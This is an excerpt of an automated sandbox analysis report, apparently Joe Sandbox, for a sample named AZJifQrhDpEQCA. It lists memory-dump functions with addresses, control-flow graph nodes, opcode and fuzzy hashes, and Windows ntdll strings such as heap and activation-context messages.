                                                • Instruction Fuzzy Hash: 02E022327841143AD700AAE6AC86FAA2658DB88B24F40006AFA0CDB282E5A88D0043F4
                                                Function 0042D627 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 93 42d627-42d632 94 42d633-42d65e 93->94 95 42d664-42d675 94->95
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d855515dfe2b777dace57eedeb7056ae2960c372e5587c5cad37ab8c17c4d6a
                                                • Instruction ID: 65aa4b60b3ddd817e293add9dca286cf99b56794a8c65d55924eb08e8d4cd6ac
                                                • Opcode Fuzzy Hash: 9d855515dfe2b777dace57eedeb7056ae2960c372e5587c5cad37ab8c17c4d6a
                                                • Instruction Fuzzy Hash: 11F01D76610209AFDB04CF95C882EEAB3F8EB48310F00811DFD198B201DB74E910CBA0
                                                Function 0042D34A Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 96 42d34a-42d34c 97 42d2ee-42d2f4 96->97 98 42d34e-42d34f 96->98 99 42d343-42d348 97->99 100 42d2f6-42d313 97->100 102 42d326-42d32c 100->102 103 42d315-42d323 100->103 105 42d332-42d340 102->105 103->102 105->99
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76c504f026082276b3608445f7be10b02be9d50f77e9918002891f0a72ac3766
                                                • Instruction ID: 998882118915395bb35563179bdb29e558390290e9ccfa098db48fbe3e5c25af
                                                • Opcode Fuzzy Hash: 76c504f026082276b3608445f7be10b02be9d50f77e9918002891f0a72ac3766
                                                • Instruction Fuzzy Hash: 9DF09E71E0022059DF20D7A0EC42FE573249B44305F5446DFB80895241FB7CEB048EA4
                                                Function 0042D633 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 107 42d633-42d65e 108 42d664-42d675 107->108
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 823a1879bcf978bd2c6715ad8f00c79c8a688764793c1040089daf54adcc501b
                                                • Instruction ID: 92b6d83568336df7de99300e766123c0dbb1358af96b72ff300b664d13505607
                                                • Opcode Fuzzy Hash: 823a1879bcf978bd2c6715ad8f00c79c8a688764793c1040089daf54adcc501b
                                                • Instruction Fuzzy Hash: 01F098B6610209AFDB04CF59D881EEA73A9EB88750F44C559FD198B241D774EA108BA0
                                                Function 0042D7A3 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 109 42d7a3-42d7b8 110 42d7be-42d7c5 109->110 111 42d7c7-42d7c9 110->111 112 42d7d9-42d7dc 110->112 111->112 113 42d7cb-42d7d7 call 42d763 111->113 113->112
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7aed85db8528c3922d778dacedcfccdaa374b7acb2e6fd9c25e4ce553da9b479
                                                • Instruction ID: 7187ff750906de1c20f3aa786ee3c13c426d67c0b10060703f7d15ccc5defce3
                                                • Opcode Fuzzy Hash: 7aed85db8528c3922d778dacedcfccdaa374b7acb2e6fd9c25e4ce553da9b479
                                                • Instruction Fuzzy Hash: BFE04836B0022427C52155496C05F97775CCBC5F60F450066FE0997341E768A90182E8
                                                Function 0042D6C3 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2afd5def0751908ef88e909b11a7362658ac992ea83bdb4015ac39d7ec56f8c5
                                                • Instruction ID: ef5722dc65a7e9e46a9eefea3ac03a5c9e92342e637b59ada8f8330ea0a96610
                                                • Opcode Fuzzy Hash: 2afd5def0751908ef88e909b11a7362658ac992ea83bdb4015ac39d7ec56f8c5
                                                • Instruction Fuzzy Hash: 0BC012716003086BD600DB88DC46FA6339C9748610F404055B90C8B241D570B9504698

                                                Non-executed Functions

                                                Function 01162890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID:
                                                • API String ID: 48624451-0
                                                • Opcode ID: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                • Instruction ID: 2ba4efefba175c9783a044ff9f5260d99f295b6afb249f79cc2384b97eaa1d91
                                                • Opcode Fuzzy Hash: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                • Instruction Fuzzy Hash: D451F5B2A00216AFDB1DDB9C8C9097EFBBCBB49240714C229E4A5D7645E375DE148BA0
                                                Function 0113A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                • SsHd, xrefs: 0113A3E4
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879FA
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 011879D0, 011879F5
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-929470617
                                                • Opcode ID: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                • Instruction ID: 0ba232c0d5b3d5cf41f058b6593831bc9f36888f55839b95f86a9e8ad3c5788f
                                                • Opcode Fuzzy Hash: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                • Instruction Fuzzy Hash: 62E1D3716083028FD72DCE28D484B6ABBE0AFC5324F194A2DE9E5CB2D5E731D945CB42
                                                Function 0113D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0118936B
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01189346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01189341, 01189366
                                                • GsHd, xrefs: 0113D874
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-576511823
                                                • Opcode ID: 50c76668f12b07e7f3ed93e93fbc3cbaadadcfdc61009fd7d61cd725ad0e2431
                                                • Instruction ID: b7d34b8b39d6e64646bcccff03cbfcc1e526c135d41a45225c8090a618cac80e
                                                • Opcode Fuzzy Hash: 50c76668f12b07e7f3ed93e93fbc3cbaadadcfdc61009fd7d61cd725ad0e2431
                                                • Instruction Fuzzy Hash: F9E1C4706083468FDB19CFA8D880B6ABBF5BFC8318F44496DE9958B285D770E944CF52
                                                Function 0116B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction ID: 29756dc2e69fc6a16e1ea0c907cc392b281841179cca39f741f793cce2c74249
                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction Fuzzy Hash: 9081C170F092498EEF2D8E6CC8517FEBBAEAF45320F184119D951E72D1C73A8860CB59
                                                Function 01129126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                • Instruction ID: c67ad88442727b8bdbba4f81649f13f860a41032ee50c5335b197ea493dab8a6
                                                • Opcode Fuzzy Hash: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                • Instruction Fuzzy Hash: FA810A71D002799BDB3ADB54CC44BEEB6B8AF49754F1041DAEA19B7240D7709E84CFA0
                                                Function 0114DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-56086060
                                                • Opcode ID: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                • Instruction ID: f573f6a13e45a8e6aa6d1cdadab924fc1b097e6af6901c7ed0647604437072e1
                                                • Opcode Fuzzy Hash: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                • Instruction Fuzzy Hash: 0E416830600B46DFDB2EEF68D485B69B7F4FF15B28F248169E5014B791C774A882CB91
                                                Function 011A4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 011A488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 011A4899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011A4888
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                • Instruction ID: 78a1d93b4d42e9cc0e8a1369fc583e83705ab0db2ecfbb91fd049db5d3384470
                                                • Opcode Fuzzy Hash: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                • Instruction Fuzzy Hash: 7741E63AA006919FCB29CF9CE840A267FE5FF49A50F4A016DED85D7B12D7B0D800CB81
                                                Function 0114DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-3526935505
                                                • Opcode ID: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                • Instruction ID: 1c1492c3c99cf7be4eb8c29a4d57e520ee41f9d311b37a43799334af22ed25e1
                                                • Opcode Fuzzy Hash: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                • Instruction Fuzzy Hash: 7E314935104B85DFEB2FFB6CD809B557BE4EF12B14F04805DE4428BA52C7B8A882CB56
                                                Function 0111C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                • Instruction ID: 287ccb152462333bc95c098463874adfc17a2485e679fe3341550c693288a821
                                                • Opcode Fuzzy Hash: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                • Instruction Fuzzy Hash: 8F115E32904218EBCF1AEFA4F84869C7B71FF54764F208519F926672D0CB715A40CB40
                                                Function 0114EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                • Instruction ID: c1b688e1ab7633a2117326e921e3ea20e8fb1fd6d1429f934780eafdecdf0ef1
                                                • Opcode Fuzzy Hash: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                • Instruction Fuzzy Hash: 29E10E71D00609DFCB29CFADD984AADBBF1BF88714F24452AE946A7361D770A842CF11
                                                Function 0119EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                • Instruction ID: 94db279a3c1a26f9124587c97a34c3d16372f9cb3a4d9dfe44b4044ce6149ec6
                                                • Opcode Fuzzy Hash: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                • Instruction Fuzzy Hash: DB714971E0021AAFDF09CFA4C984ADDBBB5BF48314F14402AE915FB254D734A946CB95
                                                Function 0119F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                • Instruction ID: 3f13d0a36aaefd65e3ffd5e2f5635d7ed3cd5e9f3d9eb2914bbc2bfacd1fa0d6
                                                • Opcode Fuzzy Hash: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                • Instruction Fuzzy Hash: C1512275E0421AAFDF09CF98D8496DCBFB5BF48314F14812AE925EB250D7389A42CF54
                                                Function 01157B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
